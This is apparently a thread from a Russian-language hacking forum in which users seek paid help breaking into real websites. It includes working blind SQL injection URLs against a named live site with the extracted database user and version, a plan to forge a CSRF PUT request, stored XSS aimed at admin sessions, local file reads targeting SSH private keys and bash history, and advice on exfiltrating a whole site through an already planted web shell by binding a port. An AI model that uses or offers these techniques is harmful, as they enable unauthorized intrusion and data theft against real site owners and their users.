Да, ты прав, прозевал. Да, boolean-based. Т.е. blind sql injection. Сейчас попробую добиться вывода. UPD: Очень странное поведение. НЕ удалость вывести у меня.
CSRF. Стандартная форма изменения данных, отправляет PUT запрос, повторить который в том же Temper Data не удается - шлет POST. POST - не принимается. GET - не срабатывет. Есть возможность загрузить HTML файл на сервер. Code: <form method="put" action="/api/users"> <input class="" id="id_first_name" name="first_name" type="text" value="newname" /></div> <input class="" id="id_last_name" name="last_name" type="text" value="lastnewname"/></div> <input class="emailinput" id="id_email" name="email" type="email" value="[email protected]"/> <input type="submit" name="Update" value="Update" class="orange-btn big" id="submit-id-update" role="confirm-apply"/> </form> В коде страницы и непосредственно в PUT запросе, никаких токенов нету, но в общем запросе он идет. Проверяется ли он? Не известно, т.к не знаю как повторить PUT запрос, но чувствую проверки токена нету. Задача Подделать PUT запрос с целью проведения CSRF атаки. 10$ в BTC за результативное решение (ЛС)
XSS. Имеется множество хранимых xss на серверах с установленным http_only на сессии. Очень хочется увидеть эти сайты глазами админа Рекомендовали попробовать BeEF, но с ним есть технические сложности. 1. Что можете порекомендовать? Как можно эксплуатировать XSS, не зная интерфейса админки? 2. Кто может помочь включить BeEF ? (https://forum.antichat.ru/threads/447600/) 30$.
слепая скуля, потому вывода нет. Code: http://iucosoft.com/software-development-details.html?place=desktop%27%20AND%20substring(user(),8,1)=%27t Code: http://iucosoft.com/software-development-details.html?place=desktop%27%20AND%20substring(version(),7,1)=%27- user() = iucosoft version() = 5.5.40-(дальше не докрутил) в ручную подбирал с телефона
Токен скорее всего проверяется, но всякое бывает. Для отправки PUT можно воспользоваться Burp-ом, для проведения атаки XMLHttpRequest. Попробуй подробно написать на гитхабе https://github.com/beefproject/beef/issues, возможно помогут.
Что можно сделать с локальной читалкой в гете при условии что конфиг к бд php формата и прочитать его соответственно не получается? Можно что то такое прочитать, что помогло бы получить доступ?
Благодарю, не знал. Но прав не хватает... Нужны еще варианты помимо конфига от бд. Можно системное что нибудь прочитать что позволит получить доступ? Ссх клиент там, и прочую лабуду
иногда случается... недавно видел один хост, на котором из под www-data читались /home/user/.ssh/id_rsa /home/user/.bash_history
есть 2 blind (одна как мапер определил blind boolean): Code: [02:52:28] [INFO] GET parameter 'price' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable но я крутил ее полтора часа, в итоге - 0, какие еще способы есть? крутил с --risk 3 и --level 5 Вторая есть точно, она на странице выводит "sql exception" и на этом все, засунул в sqlmap, он нифига не нашел, но иньекция там есть 100% Как крутить подскажите?
Добрый имеется шелл на сайте, надо забрать весь сайт со всеми файлам (более 1 tb) Упаковывать места нет (root'a тоже нет) Может можно как то заблиндится к шеллу и использовать типа wget или еще нечто подобное что бы рекурсивно скачать на комп все файлы находящиеся в той или иной папке с сохранением структуры каталогов Или может есть еще какие то варианты?
залей через шелл подключалку и биндь порт, через шелл качать долго и не скачает до конца, имхо только бинд как ты и написал, если конечно на серваке не лежит где нибудь готовый архив бэкап сайта.БД кстати тоже надо, только там попроще, через тот же шелл или админер